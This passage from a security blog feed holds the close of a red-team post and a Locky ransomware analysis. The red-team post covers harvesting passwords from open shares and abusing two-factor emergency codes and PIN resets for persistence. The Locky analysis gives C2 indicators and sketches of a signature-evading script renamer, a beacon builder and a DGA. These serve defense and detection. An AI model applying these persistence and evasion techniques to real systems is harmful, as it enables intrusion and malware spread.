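                            findings.append((path, lineno, line.strip()))
            except OSError:
                continue  # unreadable file; move on
    return findings
```

Running this against a share named “Security” is exactly how documents like the one in Figure 8 surface.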

In some cases, you may find yourself looking at a document such as the one shown in Figure 8.

Figure 8: Sample Excel spreadsheet

Passwords discovered in these types of documents give red teams direct access to the authentication server, which means they can control how the authentication process works. With the password to the account used to administer the two-factor authentication solution, the red team can grant themselves – at least temporarily – access to any existing account’s password vault. As the next section shows, with this level of access comes new techniques to further entrench the red team’s control of critical infrastructure in an environment to maintain access and evade detection.

How to prevent this attack

Restrict users’ abilities to create arbitrary open Windows shares by restricting local administrator permissions. There is almost no reason for real information to be stored in a location where it is accessible to “Everyone” (i.e. any domain user). Use Active Directory Groups to your advantage to define tight access controls where sensitive information may be. Consider implementing a Data Loss Prevention (DLP) solution that maintains encryption of sensitive files and audits their access and modification. You can even take the “Invoke-ShareFinder” script and do a quick self-assessment in a day or two - keep an eye out for shares on web servers or corporate data shares.

6) A Two-Factor Emergency

Many two-factor authentication products offer what are called “Emergency Access” codes, an authentication mechanism designed to allow VPN access after a user has lost their token and remote access is critical. An example screenshot depicting emergency access token code management is shown in Figure 9.

Figure 9: Emergency token code access management screenshot

As the screenshot above shows, the system offers a fixed “second factor” of authentication – perfect for the red team that wants stealthy remote access to the environment. These emergency access codes are particularly dangerous because they can be configured with no expiration date, allowing for a quiet return into the environment at a later date.

A word of caution for eager red teams: while creating your own profile/token using this access is tempting, there is typically more alerting and auditing around the creation of profiles than the modification of existing profiles.

As every vendor solution is different, we’ll leave it as an exercise to the reader to determine the proper method of implementing “Emergency Access” in their target environment. Keep in mind that if you’re using an existing user’s account, emergency access may not always be enough – the PIN is required in addition to the emergency access code. Fortunately, most vendors offer the option to quickly clear the PIN and set a new one, as depicted in Figure 10.


Figure 10: PIN management screenshot

How to prevent this attack

Implement regular two-factor application auditing. Log the user that logs in, the date of the login, where the login originated, and the changes that were made, especially if the changes involved the creation of new user profiles. Enforce policies that disallow emergency token access except in the direst of needs, and even then only allow this access for a short period. We highly recommend you perform a quick audit of all your two-factor authenticated accounts right now – you might be surprised what you find.

Conclusion

There are many attack paths and vectors that veteran red teams can use to bypass “secure” security controls. At Mandiant, our Red Team takes advantage of our front line intelligence, as well as the latest tools, tactics, and procedures we see our adversaries leverage in their own breaches.

Unfortunately, many companies place too much trust in security solutions such as two-factor authentication without taking the necessary steps to secure the underlying technologies. This oversight can allow attackers and red teams alike to subvert two-factor implementations even when the solutions themselves are deployed properly.

Special thanks to Andrew Burkhardt, Evan Peña, and Justin Prosco for their help with the content of this blog.

Surge in Spam Campaign Delivering Locky Ransomware Downloaders


FireEye Labs is detecting a significant spike in Locky ransomware downloaders due to a pair of concurrent email spam campaigns impacting users in over 50 countries. Some of the top affected countries are depicted in Figure 1.

Figure 1. Affected countries

As seen in Figure 2, the steep spike begins on March 21, 2016, when Locky campaigns coincided with the new Dridex campaigns discussed in the blog, “Stop Scanning My Macro”.

Figure 2. Detection on spam delivered malware

Prior to Locky’s emergence in February 2016, Dridex was responsible for a relatively higher volume of email spam campaigns. However, as shown in Figure 3, Locky is catching up with Dridex’s spam activity. This is especially true for this week, as we are seeing more Locky-related spam themes than Dridex ones. On top of that, we are also seeing Dridex and Locky running campaigns on the same day, which resulted in an abnormal detection spike.

Figure 3. Dridex versus Locky spam campaign over time

Locky Ransomware Spam

The new Locky spam campaign uses several themes, such as “invoice notice”, “attached image”, and “attached document”. See Figure 4 and Figure 5 for example campaign emails.

Figure 4. Urgent Invoice Campaign

Figure 5. Other Campaigns

The ZIP attachment as depicted in Figure 6 contains a malicious JavaScript downloader that downloads and installs the Locky ransomware.

Figure 6. Zipped Content

As shown in Figure 7, it is interesting that the recent Locky campaign prefers a JavaScript-based downloader over the Microsoft Word and Excel macro-based downloaders that were used in its early days.

Figure 7. Locky Downloader Mechanism

The preference for JavaScript downloaders is likely due to how easily the script can be transformed or obfuscated via automation to generate new variants, as depicted in Figure 8. As a result, traditional signature-based solutions may not keep up with variants whose behavioral intent is identical. At the time of discovery, most of the samples we saw were detected by only one vendor, according to VirusTotal.

Figure 8. Obfuscated JavaScript code
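To see why signature-based detection lags, consider how little automation is needed to mint a “new” sample. The following toy sketch (not the actors’ actual tooling) renames only `var`-declared identifiers, yet every run yields a file with a different hash and the same behavior:

```python
import random
import re
import string

def make_variant(js_source, seed=None):
    """Produce a functionally identical variant of a script by renaming its
    var-declared identifiers, a toy version of the automated obfuscation
    that lets spam campaigns outrun static signatures."""
    rng = random.Random(seed)
    names = re.findall(r"\bvar\s+([A-Za-z_]\w*)", js_source)
    out = js_source
    for name in names:
        new = "".join(rng.choice(string.ascii_lowercase) for _ in range(8))
        out = re.sub(r"\b%s\b" % re.escape(name), new, out)  # rename everywhere
    return out
```

Real campaign generators go further (string encoding, dead code, control-flow shuffling), but even this trivial pass defeats exact-match signatures.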

Conclusions

The volume of Locky ransomware downloaders observed is increasing, and Locky may eventually displace Dridex as the top spam-delivered malware. One of the latest victims of Locky is Methodist Hospital[1], which was reportedly forced to pay a ransom to retrieve its encrypted data. This suggests that cybercriminals are earning more from ransomware, which drives their aggressive campaigns.

On top of that, JavaScript downloaders appear to be the preferred delivery mechanism because they can be easily obfuscated to create new variants.

Technical Analysis of a Locky Payload Sample

MD5 Sum: 3F118D0B888430AB9F58FC2589207988 (First seen on 2016-02-24 in VirusTotal)

Persistence Mechanism
  • The malware does not contain a persistence mechanism. An external tool or installer is required if the attacker desires persistence.
  • The malware contains the ability to install the following registry key for persistence; this functionality is disabled in this variant.
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Locky
      • <path_to_malware>
File System Artifacts
  • The malware encrypts files on the system and creates new files with the encrypted contents in the same directory with the following naming convention:
    • <system identifier><16 random hex digits>.locky
    • The <system identifier> value is the ASCII hexadecimal representation of the first eight bytes of the MD5 hash of the GUID of the system volume.
  • The malware drops a ransom note provided by the C2 server in all directories with encrypted files and on the desktop of the current user:
    • _Locky_recover_instructions.txt
  • The malware drops an image on the desktop of the current user:
    • _Locky_recover_instructions.bmp
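The <system identifier> prefix described above can be sketched in a few lines. One assumption is flagged in the code: the exact string encoding of the volume GUID before hashing is not confirmed here (on Windows the GUID itself would come from an API such as GetVolumeNameForVolumeMountPoint).

```python
import hashlib

def locky_system_id(volume_guid):
    """ASCII hex of the first eight bytes of MD5(volume GUID), the
    <system identifier> prefix of encrypted-file names
    (<system identifier><16 random hex digits>.locky).

    Assumption: the GUID string is hashed as-is after byte-encoding; the
    precise formatting Locky uses is not documented in this analysis.
    """
    digest = hashlib.md5(volume_guid.encode()).digest()
    return digest[:8].hex().upper()
```

Because the identifier is derived deterministically from the volume GUID, every encrypted file on a given system shares the same prefix, which is useful for scoping an infection during response.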
Registry Artifacts
  • The malware creates the registry key HKCU\Software\Locky.
    • id is set to a unique identifier generated for the compromised system.
    • pubkey is set to a binary buffer that contains a public RSA key.
    • paytext is set to a binary buffer containing the recovery instructions.
    • completed is set to 1.
  • The malware changes the desktop background to a bitmap containing the ransom instructions.
    • HKCU\Control Panel\Desktop\Wallpaper is set to: %CSIDL_DESKTOPDIRECTORY%\_Locky_recover_instructions.bmp

Network-Based Signatures

Command and Control (CnC)
  • The malware communicates with the following hard-coded hosts using HTTP over TCP port 80. The malware also uses a domain name generation algorithm as described below.
    • 188.138.88.184
    • 31.41.47.37
    • 5.34.183.136
    • 91.121.97.170
Beacon Packet
  • The malware beacon builds an HTTP POST request to /main.php, as shown in Figure 9. The POST data is encoded using a custom algorithm.

Figure 9. HTTP POST request polling packet (general packet structure)
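The framing of that beacon can be sketched as follows. The custom body encoding is not documented here, so it is stubbed out as an opaque byte string; only the packet structure is illustrated.

```python
def build_beacon(host, encoded_payload):
    """Assemble the raw HTTP POST the beacon sends to /main.php over TCP/80.

    `encoded_payload` stands in for the output of Locky's custom (and here
    undocumented) POST-body encoding; this shows only the request framing.
    """
    headers = [
        "POST /main.php HTTP/1.1",
        "Host: %s" % host,
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: %d" % len(encoded_payload),
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n").encode() + encoded_payload
```

A fixed URI, hard-coded IP hosts, and an opaque POST body together make a workable basis for network signatures.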

Domain Generation Algorithm (DGA)

This sample contains a domain name generation algorithm that is based on the current month, day and year. There are eight possible domains per day and the domains change on the first of the month and on even numbered days. Figure 10 contains Python code to generate the eight possible domain names for the current date.

Figure 10. Locky Domain Generation Algorithm
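The code from the original figure did not survive syndication. The sketch below is an illustrative date-based DGA with the properties described above (eight candidate domains per day, a set that rotates on even-numbered days and on the first of the month); the hashing scheme and TLD list are hypothetical, not Locky's actual constants.

```python
import datetime
import hashlib

TLDS = ["ru", "info", "biz", "org", "net", "work", "pl", "eu"]  # hypothetical list

def dga(date, count=8):
    """Generate `count` candidate domains for `date`. The effective day is
    rounded down to the previous even day (day 1 stands alone), so the set
    changes on even-numbered days and on the first of each month."""
    day = date.day if date.day == 1 else date.day - (date.day % 2)
    seed = "%04d-%02d-%02d" % (date.year, date.month, day)
    domains = []
    for i in range(count):
        h = hashlib.md5(("%s:%d" % (seed, i)).encode()).hexdigest()
        length = 8 + int(h[0], 16) % 8  # name length between 8 and 15
        name = "".join(chr(ord("a") + int(c, 16) % 26) for c in h[:length])
        domains.append(name + "." + TLDS[i % len(TLDS)])
    return domains

if __name__ == "__main__":
    for domain in dga(datetime.date(2016, 3, 21)):
        print(domain)
```

Defenders can run the same generator forward to pre-register or sinkhole upcoming candidate domains.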

[1] http://arstechnica.com/security/2016/03/kentucky-hospital-hit-by-ransomware-attack/

